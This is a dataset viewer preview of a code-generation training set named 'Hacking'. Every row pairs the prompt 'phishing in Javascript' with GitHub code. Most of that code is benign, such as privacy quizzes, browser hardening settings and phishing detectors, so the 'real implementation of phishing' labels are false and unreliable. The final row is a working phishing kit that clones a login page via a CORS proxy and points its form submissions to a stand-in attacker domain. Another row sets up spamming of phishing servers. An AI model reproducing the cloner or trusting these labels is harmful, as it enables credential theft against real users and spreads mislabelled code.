Dataset Preview
Duplicate
The full dataset viewer is not available (click to read why). Only showing a preview of the rows.
The dataset generation failed because of a cast error
Error code:   DatasetGenerationCastError
Exception:    DatasetGenerationCastError
Message:      An error occurred while generating the dataset

All the data files must have the same columns, but at some point there are 2 new columns ({'columns', 'total_samples'}) and 7 missing columns ({'repo_name', 'problem_title', 'task', 'language', 'split', 'sample_solution', 'problem_description'}).

This happened while the json dataset builder was generating data using

hf://datasets/Basti1110/Hacking/code_dataset_20250522_220104_report.json (at revision 36d694e1dbaf2fc62705098547923b6116dfa64a)

Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations)
Traceback:    Traceback (most recent call last):
                File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1871, in _prepare_split_single
                  writer.write_table(table)
                File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/arrow_writer.py", line 643, in write_table
                  pa_table = table_cast(pa_table, self._schema)
                File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/table.py", line 2293, in table_cast
                  return cast_table_to_schema(table, schema)
                File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/table.py", line 2241, in cast_table_to_schema
                  raise CastError(
              datasets.table.CastError: Couldn't cast
              total_samples: int64
              columns: list<item: string>
                child 0, item: string
              timestamp: string
              to
              {'task': Value(dtype='string', id=None), 'problem_title': Value(dtype='string', id=None), 'problem_description': Value(dtype='string', id=None), 'sample_solution': Value(dtype='string', id=None), 'language': Value(dtype='string', id=None), 'repo_name': Value(dtype='string', id=None), 'timestamp': Value(dtype='timestamp[ns]', id=None), 'split': Value(dtype='string', id=None)}
              because column names don't match
              
              During handling of the above exception, another exception occurred:
              
              Traceback (most recent call last):
                File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1433, in compute_config_parquet_and_info_response
                  parquet_operations = convert_to_parquet(builder)
                File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1050, in convert_to_parquet
                  builder.download_and_prepare(
                File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 925, in download_and_prepare
                  self._download_and_prepare(
                File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1001, in _download_and_prepare
                  self._prepare_split(split_generator, **prepare_split_kwargs)
                File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1742, in _prepare_split
                  for job_id, done, content in self._prepare_split_single(
                File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1873, in _prepare_split_single
                  raise DatasetGenerationCastError.from_cast_error(
              datasets.exceptions.DatasetGenerationCastError: An error occurred while generating the dataset
              
              All the data files must have the same columns, but at some point there are 2 new columns ({'columns', 'total_samples'}) and 7 missing columns ({'repo_name', 'problem_title', 'task', 'language', 'split', 'sample_solution', 'problem_description'}).
              
              This happened while the json dataset builder was generating data using
              
              hf://datasets/Basti1110/Hacking/code_dataset_20250522_220104_report.json (at revision 36d694e1dbaf2fc62705098547923b6116dfa64a)
              
              Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations)

Need help to make the dataset viewer work? Make sure to review how to configure the dataset viewer, and open a discussion for direct support.

task
string
problem_title
string
problem_description
string
sample_solution
string
language
string
repo_name
string
timestamp
timestamp[us]
split
string
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
/* Author: Selvahini Kamalarajan Date: December 5, 2023 File Name: script Description: Informational website about the implications of privacy and information technology usage */ function phishing() { // Function to display correct answer for phishing email question var question = document.quiz2.question.value; if (question == "yes") { document.getElementById("message").innerHTML = "Correct! This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate."; } if (question == "no") { document.getElementById("message").innerHTML = "Incorrect. This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate. Your privacy can be compromised due to malicious script activities."; } document.getElementById("after_submit").style.visibility = "visible"; //Set element visibility to visible } function check() { // Function to check answers for Privacy Policy Question var question = document.quiz.question.value; // Output message and picture if user answers yes/no if (question == "yes") { document.getElementById("message").innerHTML = "Nice! You are one of 9% of people who read privacy policies often."; document.getElementById("picture").src = "policy.png"; } if (question == "no") { document.getElementById("message").innerHTML = "Just like you, 91% of consumers accept the terms and conditions without reading them."; document.getElementById("picture").src = "policies-stats.jpg"; } document.getElementById("after_submit").style.visibility = "visible"; } function checkAns() { // Function to check answers for quiz var correctAns = ["b", "b", "a", "d", "b", "d", "b", "b", "c", "d"]; var correct = 0; var questions = [document.quiz.q1.value, document.quiz.q2.value, document.quiz.q3.value, documen
Javascript
selvxhini-10/PersonalPrivacyWebsite
2025-05-22T22:01:00.115000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
// /****************************************************************************** * user.js * * https://github.com/pyllyukko/user.js * ******************************************************************************/ /****************************************************************************** * SECTION: HTML5 / APIs / DOM * ******************************************************************************/ // PREF: Disable Service Workers // https://developer.mozilla.org/en-US/docs/Web/API/Worker // https://developer.mozilla.org/en-US/docs/Web/API/ServiceWorker_API // https://wiki.mozilla.org/Firefox/Push_Notifications#Service_Workers // NOTICE: Disabling ServiceWorkers breaks functionality on some sites (Google Street View...) // NOTICE: Disabling ServiceWorkers breaks Firefox Sync // Unknown security implications // CVE-2016-5259, CVE-2016-2812, CVE-2016-1949, CVE-2016-5287 (fixed) user_pref("dom.serviceWorkers.enabled", false); // PREF: Disable web notifications // https://support.mozilla.org/en-US/questions/1140439 user_pref("dom.webnotifications.enabled", false); // PREF: Disable DOM timing API // https://wiki.mozilla.org/Security/Reviews/Firefox/NavigationTimingAPI // https://www.w3.org/TR/navigation-timing/#privacy // NOTICE: Disabling DOM timing API breaks item pages in AliExpress (https://github.com/pyllyukko/user.js/issues/561) user_pref("dom.enable_performance", false); // PREF: Disable resource timing API // https://www.w3.org/TR/resource-timing/#privacy-security // NOTICE: Disabling resource timing API breaks some DDoS protection pages (Cloudflare) user_pref("dom.enable_resource_timing", false); // PREF: Make sure the User Timing API does not provide a new high resolution timestamp // https://trac.torproject.org/projects/tor/ticket/16336 // https://www.w3.org/TR/2013/REC-user-timing-2
Javascript
pyllyukko/user.js
2025-05-22T22:01:00.249000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
export class PhishingDetector { constructor() { // No need to check for ai.languageModel here // We'll handle capability checks when we use the model } async calculateScore(emailContent) { try { // Log emailContent for debugging console.log('Email content received:', emailContent); const features = this.analyzeEmailFeatures(emailContent); // Check if the language model is available const capabilities = await ai.languageModel.capabilities(); if (capabilities.available !== "readily") { console.warn('Language model is not readily available'); if (capabilities.consent === "granted") { console.log('Consent already granted.'); } else if (capabilities.consent === "requirable") { // Request user consent const consentResult = await ai.languageModel.requestConsent(); if (!consentResult) { console.warn('User did not grant consent'); return 50; // Return a default score or handle accordingly } else { console.log('User granted consent.'); } } else { console.warn('Consent is not available.'); return 50; // Return a default score or handle accordingly } } // Generate the prompt const prompt = ` Instructions: - Considering the above information, assign a phishing likelihood score and provide a detailed explanation. - Use English and Arabic numerals. - Return the result in the format "The score is the following: X", where X is a number between 0 and 100. Analyze this email for phishing indicators and provide a response in the following format: The score is the following: X The explanation is: [Your detailed analysis here] End of explanation. Consider these factors: - Urgency or pressure tactics - Grammar and spelling errors - Suspicious links or attachments - Requests for sensitive information - Mismatched or fake sender addresses - Time sent
Javascript
Dalosuuu/GmailPhishGuardian_AI
2025-05-22T22:01:00.434000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
'use strict' const chromeLauncher = require('chrome-launcher') const path = require('path') // Borrow from here: // https://github.com/GoogleChrome/puppeteer/blob/master/lib/Launcher.js#L30 const DEFAULT_ARGS = [ '--disable-background-networking', '--disable-background-timer-throttling', '--disable-client-side-phishing-detection', '--disable-default-apps', '--disable-hang-monitor', '--disable-popup-blocking', '--disable-prompt-on-repost', '--disable-sync', '--enable-automation', '--enable-devtools-experiments', '--metrics-recording-only', '--no-first-run', '--password-store=basic', '--safebrowsing-disable-auto-update', '--use-mock-keychain', ] // borrow from: http://qiita.com/saekis/items/c2b41cd8940923863791 function escapeHtml (string) { if (typeof string !== 'string') { return string } return string.replace(/[&'`"<>]/g, function (match) { return { '&': '&amp;', '\'': '&#x27;', '`': '&#x60;', '"': '&quot;', '<': '&lt;', '>': '&gt;', }[match] }) } function escapeSingleQuote (string) { if (typeof string !== 'string') { return string } return string.replace(/'/g, '\\\'') } function escapeNewLine (string) { return string.replace(/\r?\n/g, '\\n') } async function createChromeLauncher (startingUrl, options) { const flags = [].concat(DEFAULT_ARGS) let chromeInstance // Lighthouse adds '--disable-setuid-sandbox' flag automatically. // The flag causes an error on linux when staring headless chrome. // '--no-sandbox' suppresses an error caused by '--disable-setuid-sandbox'. if (process.platform === 'linux') { flags.push('--no-sandbox') } if (!options.visible) { flags.push('--headless') flags.push('--hide-scrollbars') flags.push('--mute-audio') } if (options.chromeFlags && Array.isArray(options.chromeFlags)) { options.chromeFlags.forEach(f => { if (f.indexOf('--') === -1) { throw new Error('An item of chromFlags option
Javascript
OnetapInc/chromy
2025-05-22T22:01:00.573000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
// eslint-disable-next-line no-undef docute.init({ debug: true, title: 'Spam Scanner', repo: 'spamscanner/spamscanner', 'edit-link': 'https://github.com/spamscanner/spamscanner/tree/master/', twitter: 'niftylettuce', nav: { default: [ { title: 'The best anti-spam, email filtering, and phishing prevention service.', path: '/' } ] }, // eslint-disable-next-line no-undef plugins: [docuteEmojify()] });
Javascript
spamscanner/spamscanner
2025-05-22T22:01:00.710000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
// this is the code which will be injected into a given page... var config = { apiKey: "AIzaSyD1FfiwIWzbbn0rhqQg6ZF2KzVBOiqU7oQ", authDomain: "phish-ai-production.firebaseapp.com", databaseURL: "https://phish-ai-production.firebaseio.com", projectId: "phish-ai-production", storageBucket: "gs://phish-ai-production.appspot.com/", messagingSenderId: "976092427021" }; firebase.initializeApp(config); var db = firebase.firestore(); function open_options_page() { chrome.tabs.create({'url': "/options.html" } ) }; function open_demo_page() { chrome.tabs.create({'url': "https://www.phish.ai/request-a-demo" } ) }; function restore_popup() { chrome.storage.local.get({ idnEnable: true, aiEnable: true }, function(items) { if (!items.aiEnable) { document.getElementById('zero_day_disabled').style.display = "" } if (!items.idnEnable) { document.getElementById('idn_disabled').style.display = "" } var bg = chrome.extension.getBackgroundPage(); var query = {active: true, currentWindow: true}; chrome.tabs.query(query, function callback(tabs) { if (items.idnEnable) { var currentTab = tabs[0]; // there will be only one in this array var hostname = bg.extractHostname(currentTab.url); var domain = document.getElementById('domain'); var idn_status = document.getElementById('idn_status'); if (bg.isDomainIDN(hostname)) { domain.className = 'badge badge-danger'; idn_status.className = 'badge badge-danger'; idn_status.innerHTML = 'IDN Detected'; } domain.innerHTML = hostname; } if (items.aiEnable) { if (currentTab.id in bg.tabMalicious) { var zero_day = document.getElementById('zero_day'); var ta
Javascript
phishai/phish-protect
2025-05-22T22:01:00.830000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
respecConfig.localBiblio = { "aicaptcha": { "title": "aiCaptcha: Using AI to beat CAPTCHA and post comment spam", "date": "", "authors": ["Casey Chesnut"], "editors": [], "etAl": false, "publisher": "", "href": "http://www.brains-n-brawn.com/default.aspx?vDir=aicaptcha" }, "able-gamers": { "title": "Thought On Accessibility and VR", "date": "March, 2017", "authors": ["AJ Ryan"], "editors": [], "etAl": false, "publisher": "", "href": "https://ablegamers.org/thoughts-on-accessibility-and-vr/" }, "antiphishing": { "title": "Phishing Activity Trends Report", "date": "July, 2005", "authors": [], "editors": [], "etAl": false, "publisher": "Anti-Phishing Working Group", "href": "http://antiphishing.org/APWG_Phishing_Activity_Report_Jul_05.pdf" }, "breaking": { "title": "Breaking CAPTCHAs Without Using OCR", "date": "", "authors": ["Howard Yeend"], "editors": [], "etAl": false, "publisher": "", "href": "http://www.cs.berkeley.edu/%7Emori/gimpy/gimpy.html" }, "breakingocr": { "title": "Breaking CAPTCHAs Without Using OCR", "date": "", "authors": ["Howard Yeend"], "editors": [], "etAl": false, "publisher": "", "href": "http://www.puremango.co.uk/cm_breaking_captcha_115.php" }, "chafee": { "title": "17 USC 121, Limitations on exclusive rights: reproduction for blind or other people with disabilities (also known as the Chafee Amendment)", "date": "", "authors": [], "editors": [], "etAl": false, "publisher": "", "href": "https://www.copyright.gov/title17/92chap1.html" }, "captcha-ocr": { "title": "CAPTCHA: Attacks and Weaknesses against OCR technology", "date": "2013", "authors": [ "Silky Azad", "Kiran Jain"], "publisher": "Journal of Computer science and Technology", "etAl": false, "editors": [], "href": "https://computerresearch.org/index.php/computer/article/download/368/368" }, "information-security": { "ti
Javascript
w3c/apa
2025-05-22T22:01:01.006000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
'use strict'; const fs = require('fs-extra'); const debug = require('debug')('app'); const express = require('express'); const csp = require('express-csp-header'); const frameguard = require('frameguard'); const xssFilter = require('x-xss-protection'); const bodyParser = require('body-parser'); const url = require('url'); const dateFormat = require('dateformat'); const {fork} = require('child_process'); const download = require('download-file'); const rimraf = require('rimraf'); const phishingDetector = require('eth-phishing-detect/src/detector'); const crypto = require("crypto"); const request = require('request'); const app = express(); const config = require('./config'); const check = require('./_utils/webcheck.js'); const lookup = require('./_utils/lookup.js'); let default_template = fs.readFileSync('./_layouts/default.html', 'utf8'); let cache; let updating_now = false; let icon_warnings = []; var older_cache_time; if('perform_dns_lookup' in config && config.perform_dns_lookup === false) { default_template = default_template.replace("{{ config.perform_dns_lookup }}", "<div class='ui info message'>DNS lookups not performed due to configuration.</div><br />"); } else { default_template = default_template.replace("{{ config.perform_dns_lookup }}", ''); } /* See if there's an up-to-date cache, otherwise run `update.js` to create one. */ function getCache(callback = false) { if (!fs.existsSync('_cache/cache.json')) { debug("No cache file found. Creating one..."); if (callback) { if (!updating_now) { updating_now = true; fork('update.js'); } var checkDone = setInterval(function() { if (fs.existsSync('_cache/cache.json')) { updating_now = false; cache = JSON.parse(fs.readFileSync('_cache/cache.json')); clearInterval(checkDone); debug("Successfully updated cache!");
Javascript
MrLuit/EtherScamDB
2025-05-22T22:01:01.099000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
/** * Github * https://github.com/6IX7ine/certstreamcatcher * * Copyright (c) 2017 Fábio Castro * Licensed under the MIT license. */ 'use strict' const tld = require('tldjs'); const lodash = require('lodash'); const color = require('cli-color'); const status = require('node-status'); const punycode = require('punycode'); const yellow = color.yellow.underline; const danger = color.redBright.underline; const white = color.white.underline; const certificates = status.addItem('certificates'); const mapping = { "a": ["à", "á", "â", "ã", "ä", "å", "ā", "ă", "ą", "ǎ", "ȁ", "ȃ", "ȧ", "ḁ", "ẚ", "ạ"], "b": ["ḃ", "ḅ", "ḇ", "ƀ"], "c": ["ç", "ć", "ĉ", "ċ", "č"], "d": ["ḋ", "ḍ", "ḏ", "ḑ", "ḓ", "đ"], "e": ["è", "é", "ê", "ë", "ĕ", "ė", "ę", "ě", "ȅ", "ȇ", "ȩ", "ḙ", "ḛ", "ẹ", "ẽ"], "f": ["ḟ"], "g": ["ĝ", "ğ", "ġ", "ģ", "ǧ", "ǵ", "ḡ"], "h": ["ĥ", "ȟ", "ḣ", "ḥ", "ḧ", "ḩ", "ḫ", "ẖ"], "i": ["ì", "í", "î", "ï", "ĩ", "ī", "ĭ", "į", "ǐ", "ȉ", "ȋ", "ḭ", "ị"], "j": ["ĵ", "ǰ"], "k": ["ķ", "ǩ", "ḱ", "ḳ", "ḵ"], "l": ["ĺ", "ļ", "ľ", "ŀ", "ḷ", "ḻ", "ḽ", "ι", "ł"], "m": ["ḿ", "ṁ", "ṃ", "ϻ"], "n": ["ñ", "ń", "ņ", "ň", "ʼn", "ǹ", "ṅ", "ṇ", "ṉ", "ṋ"], "o": ["ò", "ó", "ô", "õ", "ö", "ō", "ŏ", "ő", "ơ", "ǒ", "ǫ", "ố", "ȍ", "ȏ", "ȯ", "ọ", "ø", "ộ"], "p": ["ṕ", "ṗ", "ϸ"], "r": ["ŕ", "ŗ", "ř", "ȑ", "ȓ", "ṙ", "ṛ", "ṟ", "ґ"], "s": ["ŝ", "ş", "š", "ș", "ṡ", "ṣ"], "t": ["ţ", "ť", "ț", "ṫ", "ṭ", "ṯ", "ṱ", "ẗ"], "u": ["ù", "ú", "û", "ü", "ũ", "ū", "ŭ", "ů", "ű", "ų", "ư", "ǔ", "ȕ", "ȗ", "ṳ", "ṵ", "ṷ", "ụ"], "v": ["ṽ", "ṿ"], "w": ["ŵ", "ẁ", "ẃ", "ẅ", "ẇ", "ẉ", "ẘ"], "x": ["ẋ", "ẍ"], "y": ["ý", "ÿ", "ŷ", "ȳ", "ẏ", "ẙ", "ỳ", "ỵ", "ỹ"], "z": ["ź", "ż", "ž", "ẑ", "ẓ", "ẕ"] } module.exports = { certstreamClientPhishing: function (certstream, regex, tlds, options) { this.certstream = certstream; this.regex = regex; this.tlds = tlds; let settings = { tlds: false }; if (!op
Javascript
jimywork/certstreamcatcher
2025-05-22T22:01:01.244000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
// Redirecting to links from the book: // https://nooffice.link/REDIRECT // which translates to https://nooffice.org/redirect?to=REDIRECT let links = new Map([ //list of REDIRECT links ['nooffice', 'https://nooffice.org'], //chapter 19 ['ocr', 'https://en.wikipedia.org/wiki/Optical_character_recognition'], ['evernote','https://Evernote.com'], ['swiftscan', 'https://swiftscan.app/en/index.html'], ['ios-scan', 'https://support.apple.com/en-us/HT210336'], ['dropbox', 'https://www.dropbox.com'], ['box', 'https://box.com'], ['gdrive', 'https://drive.google.com'], ['onedrive', 'https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage'], ['iwork', 'https://www.apple.com/iwork/'], ['gsheets', 'https://www.google.com/sheets/about/'], ['excel', 'https://www.microsoft.com/en-us/microsoft-365/excel'], ['mfa', 'https://en.wikipedia.org/wiki/Multi-factor_authentication'], ['messages', 'https://support.apple.com/explore/messages'], ['signal', 'https://www.signal.org'], ['telegram', 'https://telegram.org'], ['whatsapp', 'https://www.whatsapp.com'], ['ipadonly', 'https://ipadonly.com/book/'], ['vpn', 'https://en.wikipedia.org/wiki/Virtual_private_network'], ['github', 'https://nooffice.org/why-in-any-company-you-should-be-using-version-control-for-anything-how-we-use-github-not-only-bc2554308455/'], //chapter 20 ['conversation', 'https://en.wikipedia.org/wiki/A_Little_Less_Conversation'], ['slack', 'https://slack.com'], ['msteams', 'https://www.microsoft.com/en-us/microsoft-365/microsoft-teams/group-chat-software'], ['cognitive', 'https://www.pnas.org/content/106/37/15583'], ['digital-minimalism', 'https://www.calnewport.com/books/digital-minimalism/'], //chapter 21 ['offices', 'https://sliwinski.com/tag/office'], ['cabinet', 'https://sliwinski.com/declutter-your-desk-why-i-love-my-clutter-fre/'], ['stand', 'https://michael.team/myoffice/'], ['whiteboard', 'https://sliwinski.com/whiteboard/'], //chapter 22 //chapter 23 ['basecamphires', 'https://m.signa
Javascript
Nozbe/NoOffice.org
2025-05-22T22:01:01.359000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
/* OpenID for node.js * * http://ox.no/software/node-openid * http://github.com/havard/node-openid * * Copyright (C) 2010 by Håvard Stranden * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * * -*- Mode: JS; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- * vim: set sw=2 ts=2 et tw=80 : */ const { access } = require('fs'); var Buffer = require('buffer').Buffer, crypto = require('crypto'), http = require('./http'), querystring = require('querystring'), url = require('url'), xrds = require('./lib/xrds'); var _associations = {}; var _discoveries = {}; var _nonces = {}; var AX_MAX_VALUES_COUNT = 1000; var openid = exports; var _get = http.get; var _post = http.post; function hasOwnProperty(obj, prop) { return Object.prototype.hasOwnProperty.call(obj, prop); } openid.RelyingParty = function (returnUrl, realm, stateless, strict, extensions) { this.returnUrl = returnUrl; this.realm = realm || null; this.stateless = stateless; this.str
Javascript
havard/node-openid
2025-05-22T22:01:01.483000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
//If container already in DOM, remove it if(report.length > 0) report.remove(); //Container report /*report = $('<div id="report">\ <textarea id="reportv" maxlength="150" placeholder="Attention, les signalements abusifs, sans intérêt ou encore pour dire merci seront passible de sanction allant d\'un simple avertissement au ban."></textarea>\ </div>');*/ body.append('<div id=report> </div>'); report = cacheSel('#report'); //Container, select subject / textarea report.html('<p>Selectionner le sujet de votre signalement</p>\ <ul>\ <li id=reDead><i class="fa fa-unlink"> Liens morts</i></li>\ <li id=reForb><i class="fa fa-ban"> Hors charte</i></li>\ <li id=reMove><i class="fa fa-share"> A déplacer</i></li>\ <li id=reSecu><i class="fa fa-crosshairs"> Virus/Trojan/Scam...</i></li>\ <li id=reHate><i class="fa fa-globe"> Insulte envers un peuple/religion/minorité...</i></li>\ <li id=rePers><i class="fa fa-eye-slash"> Violation vie privée</i></li>\ <li id=reProt><i class="fa fa-child"> Contenu pédophile</i></li>\ <li id=reOthr><i class="fa fa-random"> Réouverture, résolu, autres...</i></li>\ </ul>\ <textarea id=reportv placeholder="default"></textarea>'); //Refresh caching report = cacheSel('#report'); reportv = cacheSel('#reportv'); //Hide the reportv until a subject get select reportv.hide(); //Get 80% in px var sizecal = $(window).width() * 0.8; //Max width if(parseInt(sizecal) > 600) var sizecal = 600; //Pop the container vote report.dialog({ width:sizecal, modal:true, resizable: true, title:'Signalement', dialogClass:'modalNinja', show:{effect:'scale', duration: 320}, buttons: [{ text: 'Confirmation', click: function() { //Subject reps = reportv.attr('class'); //Value textarea rept = reportv.val(); //Less 10 chars return if(rept.length < 10) { coloredInput(reportv,'errorSe','Minimum 10 caractères'); return;
Javascript
Anyon3/ninjacms
2025-05-22T22:01:01.680000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
/** * Created by IntelliJ IDEA. * User: Altryne * Date: Nov 20, 2010 * Time: 4:55:41 AM * To change this template use File | Settings | File Templates. */ var intervall = 0; can_run_apps = false, folder_open = false, tick = '', doubleclickthreshhold = 200, isDblClick = false, canScroll = true, active_app = ''; $('.page .delete,#dock .delete').live('click', function(event) { event.stopPropagation(); event.stopImmediatePropagation(); if(confirm('Are you sure you want to delete this app from you iPad?')){ $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide(); $(this).siblings('.app_logo') .stop() .css('position','absolute') .animate({left:"50%",width:1,top:"50%",height: 1},'easeInQuint',function(){$(this).parent().remove()}) } }); $('#multitask_bar .delete').live('mousedown ', function(event) { event.stopPropagation(); event.stopImmediatePropagation(); $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide(); $(this).siblings('.app_logo') .stop() .css('position','absolute') .animate({left:"50%",width:1,top:"50%",height: 1},'easeInQuint',function(){ _id = $(this).parent().attr('id'); $('#'+_id+'_app').remove(); $(this).parent().remove(); if(!$('#multitask_bar li').length){ closeMultitask(200); } }) }); $('.page.apps>li,#dock li').live('mousedown mouseup', function(event) { if (event.type == 'mousedown') { $(this).addClass('mousedown'); if (!$('#drag').is('.ui-draggable-dragging') && !$('body').is('.editMode')) { can_run_apps = true; intervall = setTimeout(edit_mode, '1000'); }else if($(this).hasClass('folder') && $('body').is('.editMode')){ openFolder($(this).attr('id
Javascript
altryne/Ipad-Simulator
2025-05-22T22:01:01.825000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
/* * Copyright (c) 2021, Atheropids. All rights reserved. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ 'use strict'; const https = require('https'); const readline = require('readline'); const tough = require('tough-cookie'); // Spec holder class. Please see comments of member variables for details. class PhishingServer { constructor(__domain, __entry_path = '/', __login_page = '/home/login', __login_inbox = '/login/dologin') { // Target C&C server domain name. this.target_domain = __domain; // Remote path for server cookie init. this.entry_path = __entry_path; // Remote path of the phishing page. this.phishing_page_path = __login_page; // Remote path of the phishing data receiver. this.phishing_target_path = __login_inbox; } } /* * Settings are here c: * Modify them on your purpose. */ // List of malicious servers. let spam_targets = [ // [seized operation] new PhishingServer('steamcomrninuty.ru'), // [seized operation] new PhishingServer('steamcommnunmity.com', '/id/zxayonax'), // [seized operation] new PhishingServer('nitro-discord.ru', '/airdrop'), // [seized operation] new PhishingServer('steamcommunity.link'), // [seized operation] new PhishingServer('discorcl.link'), new PhishingServer('steamcommmunilty.com', '/tradoffer/new/?partner=406482431&token=lfk938iK'), new PhishingServer('discorrd.ru'), new PhishingServer('free-nitroos.ru'), new PhishingServer('discod.info', '/nitro-gift'), new PhishingServer('d
Javascript
Atheropids/SteamComrninuty-Phish-Spammer
2025-05-22T22:01:02.005000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
module.exports = [ '2015', '2016', '2017', '2018', '2019', '2020', 'abuse', 'academy', 'accessibility', 'account', 'accountant', 'accounting', 'accountmanager', 'accountmanagers', 'accounts', 'accountspayable', 'acquisition', 'admin', 'admin1', 'administracao', 'administracion', 'administrador', 'administratie', 'administratif', 'administration', 'administrativo', 'administrator', 'administrators', 'admins', 'adminteam', 'admissions', 'adops', 'ads', 'adventure', 'advertise', 'advertising', 'advertisingsales', 'advice', 'advisor', 'advisors', 'adwords', 'affiliate', 'affiliates', 'agence', 'agencia', 'agency', 'agents', 'alarm', 'alarms', 'alert', 'alerts', 'alexa', 'all', 'all-employees', 'all-pms', 'all-staff', 'all-team', 'all-users', 'all.employees', 'all.staff', 'all.users', 'all_staff', 'alla', 'alle', 'allemployees', 'allhands', 'allsales', 'allstaff', 'allstudents', 'allteachers', 'allteam', 'allusers', 'alpha', 'alphas', 'alumni', 'ambassadors', 'amministrazione', 'analysts', 'analytics', 'android', 'angels', 'animation', 'announce', 'announcements', 'ap', 'api', 'app', 'apple', 'application', 'applications', 'apply', 'appointments', 'apps', 'archives', 'asistente', 'asset', 'assistanthead', 'assistencia', 'assistenza', 'associates', 'associates-all', 'ateam', 'atencionalcliente', 'atendimento', 'auctions', 'available', 'backend', 'backend-dev', 'backup', 'bd', 'benefits', 'berlin', 'bestellung', 'beta', 'biblioteca', 'bibliotheque', 'billing', 'bills', 'biuro', 'biz', 'bizdev', 'blog', 'board', 'bod', 'bookclub', 'booking', 'bookings', 'boston', 'boxoffice', 'brand', 'branding', 'brands', 'brandsolutions', 'broadcast', 'buchhaltung', 'bugs', 'build', 'bursar', 'busdev', 'business',
Javascript
decal/werdlists
2025-05-22T22:01:02.114000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
page_src = "https://login.vulnwebsite.com/"; phishing_url="http://yourphishingdomain.com/"; function doHTMLMagic(pageSource, baseURL, phishDomain) { replaceSrc = pageSource.replace('href="/', "href=\"" + baseURL+ '/'); replaceSrc = replaceSrc.replace('src="/', "src=\"" + baseURL+ '/'); replaceSrc = replaceSrc.replace('<head>', '<head><base href="' + phishDomain + '">'); return replaceSrc; } function createCORSRequest(method, url) { var xhr = new XMLHttpRequest(); if ("withCredentials" in xhr) { xhr.open(method, url, true); } else if (typeof XDomainRequest != "undefined") { xhr = new XDomainRequest(); xhr.open(method, url); } else { xhr = null; } return xhr; } function makeCorsRequest(baseURL, phishDomain) { var url = 'https://cors-anywhere.herokuapp.com/' + baseURL; var xhr = createCORSRequest('GET', url); if (!xhr) { return; } xhr.onload = function() { var pageSourceStr = doHTMLMagic(xhr.responseText, baseURL, phishDomain) document.open(); document.write(pageSourceStr); document.close(); }; xhr.send(); } makeCorsRequest(page_src, phishing_url); window.history.pushState("", "Login", "/login");
Javascript
infosec-au/phishJS
2025-05-22T22:01:02.254000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
